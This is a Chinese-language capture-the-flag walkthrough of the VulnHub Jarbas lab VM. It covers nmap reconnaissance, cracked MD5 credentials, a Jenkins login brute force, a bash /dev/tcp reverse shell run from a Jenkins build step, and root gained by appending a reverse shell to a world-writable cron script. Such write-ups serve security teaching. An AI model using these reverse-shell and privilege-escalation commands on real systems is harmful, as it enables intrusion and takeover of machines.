Jarbas

靶机地址:https://www.vulnhub.com/entry/jarbas-1,232/

1 信息收集

  • Kali 和 靶机都处于同一网段内,直接查找靶机 IP 地址:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root at kali in ~ 
$ nmap -sn --min-rate 10000 192.168.92.0/24                   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:13 CST
Nmap scan report for 192.168.92.1
Host is up (0.00040s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.92.2
Host is up (0.00017s latency).
MAC Address: 00:50:56:F3:1F:1F (VMware)
Nmap scan report for 192.168.92.145
Host is up (0.00033s latency).
MAC Address: 00:0C:29:23:07:8B (VMware)
Nmap scan report for 192.168.92.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:E1:1E:EB (VMware)
Nmap scan report for 192.168.92.170
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.00 seconds
  • 扫描开放端口:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in ~ 
$ nmap -p- --min-rate 10000 192.168.92.145 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:16 CST
Nmap scan report for 192.168.92.145
Host is up (0.00024s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:23:07:8B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 67.83 seconds
  • 扫描端口对应服务:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root at kali in ~ 
$ nmap -p22,80,3306,8080 -sT -sV -O --min-rate 10000 192.168.92.145
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:18 CST
Nmap scan report for 192.168.92.145
Host is up (0.00056s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:23:07:8B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.56 seconds
  • 针对端口服务扫描一下漏洞:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root at kali in ~ 
$ nmap -p22,80,3306,8080 --script=vuln --min-rate 10000 192.168.92.145
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:20 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.92.145
Host is up (0.00048s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum: 
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:23:07:8B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 67.31 seconds
  • 分析一下扫描结果:
1
2
3
4
5
6
## 开放 21、22、80、3306 端口

22 - SSH 服务 - 弱口令、暴力破解
80 - Web 服务 - 漏洞形式多样
3306 - MySQL 服务 - 弱口令、暴力破解
8080 - Web 服务 - 漏洞形式多样
  • 从 80 Web 开始测试。

2 目录扫描

  • 访问 Web 服务:

  • 嗯哼 Jenkins,使用 dirsearch 扫一扫:
1
2
root at kali in ~ 
$ dirsearch -u 'http://192.168.92.145'

  • 发现几个目录,访问一下:

  • 发现一个 access.html,访问一下:

  • 提示 “Creds encrypted in a safe way!” 大概就是加密的认证,一看就知道是 MD5,严谨一点还是判断一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

root at kali in ~ 
$ hash-identifier '5978a63b4654c73c60fa24f836386d87'                  
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
  • 判断出是 MD5,拿网站碰撞一下:
1
2
3
tiago:5978a63b4654c73c60fa24f836386d87 - italia99
trindade:f463f63616cb3f1e81ce46b39f882fd5 - marianna
eder:9b38e2b1e8b12f426b0d208a7ab6cb98 - vipsu
  • 由于没找到登录框,去 8080 试试:

  • 发现是一个 Jenkins 的登录窗口。

3 暴力破解

  • 存在登录窗口,使用 Burpsuite 进行暴力破解:

  • 爆破出账号密码:eder - vipsu。
  • 登录一下:

4 Jenkins 漏洞

  • 新建一个任务:

  • 输入名字:

  • 直接发现一个 Shell 命令行:

  • 反弹一下:
1
2
3
4
5
6
7
## 靶机
/bin/bash -i >& /dev/tcp/192.168.92.170/4444 0>&1

## kali
root at kali in ~ 
$ nc -lvvp 4444                                                       
listening on [any] 4444 ...
  • 点击立即构建:

  • 成功反弹:
1
2
3
4
5
6
7
8
9
root at kali in ~ 
$ nc -lvvp 4444                                                       
listening on [any] 4444 ...
192.168.92.145: inverse host lookup failed: Unknown host
connect to [192.168.92.170] from (UNKNOWN) [192.168.92.145] 52200
bash: no job control in this shell
bash-4.2$ id
id
uid=997(jenkins) gid=995(jenkins) groups=995(jenkins) context=system_u:system_r:initrc_t:s0

5 Cron 提权

  • 经过一系列测试,发现 crontab 下有一个 root 权限的计时任务:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

## For details see man 4 crontabs

## Example of job definition:
## .---------------- minute (0 - 59)
## |  .------------- hour (0 - 23)
## |  |  .---------- day of month (1 - 31)
## |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
## |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
## |  |  |  |  |
## *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
  • 查看一下该文件:
1
2
3
4
5
6
7
8
bash-4.2$ ls -l /etc/script/CleaningScript.sh
ls -l /etc/script/CleaningScript.sh
-rwxrwxrwx. 1 root root 50 Apr  1  2018 /etc/script/CleaningScript.sh
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
  • 发现是一个具有读写执行权限的文件,直接写入 shell:
1
2
3
4
5
6
7
8
## 靶机
bash-4.2$ echo '/bin/bash -i >& /dev/tcp/192.168.92.170/4445 0>&1' >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.92.170/4445 0>&1' >> /etc/script/CleaningScript.sh

## kali
root at kali in ~ 
$ nc -lvvp 4445                                                       
listening on [any] 4445 ...
  • 反弹成功:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root at kali in ~ 
$ nc -lvvp 4445
listening on [any] 4445 ...
192.168.92.145: inverse host lookup failed: Unknown host
connect to [192.168.92.170] from (UNKNOWN) [192.168.92.145] 49678
bash: no job control in this shell
[root@jarbas ~]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023

[root@jarbas ~]# cd /root
cd /root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat fla*
cat fla*
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs